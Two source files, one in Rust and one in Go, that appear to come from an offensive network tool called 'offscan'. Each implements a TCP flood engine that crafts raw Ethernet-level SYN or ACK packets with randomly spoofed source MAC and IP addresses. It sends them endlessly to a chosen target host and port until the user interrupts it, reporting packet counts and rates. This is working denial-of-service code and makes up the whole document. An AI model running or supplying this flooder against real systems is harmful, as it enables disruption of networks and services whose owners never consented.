File: src/engines/flood_tcp/tcp_flood.rs
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;
use std::{net::Ipv4Addr};
use crate::engines::TcpArgs;
use crate::addrs::Mac;
use crate::builders::Packets;
use crate::generators::RandomValues;
use crate::iface::{SysInfo, Iface};
use crate::sockets::Layer2Socket;
use crate::utils::{abort, inline_display, get_first_and_last_ip, CtrlCHandler, resolve_mac};



pub struct TcpFlooder {
    builder   : Packets,
    iface     : Iface,
    pkts_sent : usize,
    rand      : RandomValues,
    src_ip    : Option<Ipv4Addr>,
    src_mac   : Option<Mac>,
    dst_ip    : Ipv4Addr,
    dst_mac   : Mac,
    dst_port  : u16,
    flag      : String,
}


impl TcpFlooder {

    pub fn new(args: TcpArgs) -> Self {
        let iface = SysInfo::iface_from_ip(args.dst_ip);
        let cidr  = iface.cidr().unwrap_or_else(|e| abort(e));

        let (first_ip, last_ip) = get_first_and_last_ip(&cidr);

        Self {
            builder   : Packets::new(),
            pkts_sent : 0,
            rand      : RandomValues::new(Some(first_ip), Some(last_ip)),
            src_ip    : args.src_ip,
            src_mac   : resolve_mac(args.src_mac.clone(), &iface),
            dst_ip    : args.dst_ip,
            dst_mac   : resolve_mac(Some(args.dst_mac.clone()), &iface).unwrap(),
            dst_port  : args.port,
            flag      : if args.ack {"ack".to_string()} else {"syn".to_string()},
            iface,
        }
    }



    pub fn execute(&mut self){
        self.display_exec_info();
        self.send_endlessly();
    }


    
    fn display_exec_info(&self) {
        let src_mac = match self.src_mac {
            Some(mac) => mac.to_string(),
            None      => "Random".to_string(),
        };

        let src_ip = match self.src_ip {
            Some(ip) => ip.to_string(),
            None     => "Random".to_string(),
        };

        let dst_mac = self.dst_mac.to_string();

        println!("SRC >> MAC: {} / IP: {}", src_mac, src_ip);
        println!("DST >> MAC: {} / IP: {}", dst_mac, self.dst_ip);
        println!("IFACE: {}", self.iface.name());
    }



    fn send_endlessly(&mut self) {
        let socket  = Layer2Socket::new(&self.iface);
        let running = Arc::new(AtomicBool::new(true));
        CtrlCHandler::setup(running.clone());

        while running.load(Ordering::SeqCst) {
            let pkt = self.get_pkt();
            socket.send(pkt);

            self.pkts_sent += 1;
            inline_display(&format!("Packets sent: {}", &self.pkts_sent));
        }

        println!("\nFlood interrupted");
    }


    
    #[inline]
    fn get_pkt(&mut self) -> &[u8] {
        self.builder.tcp_ether(
            self.src_mac.unwrap_or_else(|| self.rand.random_mac()), 
            self.src_ip.unwrap_or_else( || self.rand.random_ip()), 
            self.rand.random_port(),
            self.dst_mac, 
            self.dst_ip,
            self.dst_port,
            &self.flag
        )
    }

}



impl crate::EngineTrait for TcpFlooder {
    type Args = TcpArgs;
    
    fn new(args: Self::Args) -> Self {
        TcpFlooder::new(args)
    }
    
    fn execute(&mut self) {
        self.execute();
    }
}

File: internal/engines/floodtcp/tcp_flood.go
/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package floodtcp

import (
	"fmt"
	"net"
	"time"

	"offscan/internal/conv"
	"offscan/internal/generators"
	"offscan/internal/ifaceinfo"
	"offscan/internal/packet"
	"offscan/internal/sockets"
	"offscan/internal/sysinfo"
	"offscan/internal/utils"
)



func Run(args []string) {
    New(args).Execute()
}



type TcpFlooder struct {
    builder   *packet.TcpPkt
    iface     *net.Interface
    pktsSent   int
    rand      *generators.RandomValues
    srcIP      net.IP
    srcMAC     net.HardwareAddr
    dstIP      net.IP
    dstMAC     net.HardwareAddr
    dstPort    uint16
    duration   float64
}



func New(argList []string) *TcpFlooder {
    args   := ParseTcpArgs(argList)

	dstIP  := conv.MustStrToIPv4(args.DstIP)
	dstMAC := conv.MustStrToMac(args.DstMAC)

	iface  := sysinfo.MustRouteIfaceForDstIP(dstIP)
    cidr   := ifaceinfo.MustCIDR(iface)
	
	srcIP  := net.ParseIP(args.SrcIP)
	srcMAC := sysinfo.ResolveMac(args.SrcMAC, iface)

    firstIP, lastIP := utils.GetFirstAndLastIP(cidr)
	
	randGen := generators.NewRandomValues(&firstIP, &lastIP)

    return &TcpFlooder{
        builder:   packet.NewTcpPkt(),
        iface:     iface,
        rand:      randGen,
        srcIP:     srcIP,
        srcMAC:    srcMAC,
        dstIP:     dstIP,
        dstMAC:    dstMAC,
        dstPort:   args.Port,
    }
}



func (t *TcpFlooder) Execute() {
    t.displayInfo()
    t.sendEndlessly()
    t.displayExecInfo()
}



func (t *TcpFlooder) displayInfo() {
    srcMACStr := "Random"
    if t.srcMAC != nil {
        srcMACStr = t.srcMAC.String()
    }

	srcIPStr := "Random"
    if t.srcIP != nil {
        srcIPStr = t.srcIP.String()
    }

	fmt.Printf("[*] SRC >> MAC: %s / IP: %s\n", srcMACStr, srcIPStr)
    fmt.Printf("[*] DST >> MAC: %s / IP: %s\n", t.dstMAC.String(), t.dstIP.String())
    fmt.Printf("[*] IFACE: %s\n", t.iface.Name)
}



func (t *TcpFlooder) sendEndlessly() {
    socket := sockets.NewL2Socket(t.iface)
    ctx    := utils.SignalContext()

    fmt.Println("[+] Sending packets. Press CTRL + C to stop")
    start := time.Now()

    for {
        select {
        case <-ctx.Done():
            fmt.Println("\n[-] Flood interrupted")
            t.duration = time.Since(start).Seconds()
            return
        
		default:
            pkt := t.getPkt()
            socket.Send(pkt)
            t.pktsSent++
        }
    }
}



func (t *TcpFlooder) getPkt() []byte {
    srcMAC := t.srcMAC
    if srcMAC == nil {
        srcMAC = t.rand.RandomMac()
    }

	srcIP := t.srcIP
    if srcIP == nil {
        srcIP = t.rand.RandomIP()
    }

	srcPort := t.rand.RandomPort()

	return t.builder.L2Pkt(srcMAC, srcIP, srcPort, t.dstMAC, t.dstIP, t.dstPort)
}



func (t *TcpFlooder) displayExecInfo() {
    fmt.Printf("[%%] %d packets sent in %.2f seconds\n", t.pktsSent, t.duration)
    if t.duration > 1.0 {
        rate := float64(t.pktsSent) / t.duration
        fmt.Printf("[%%] %.2f packets sent per second\n", rate)
    }
}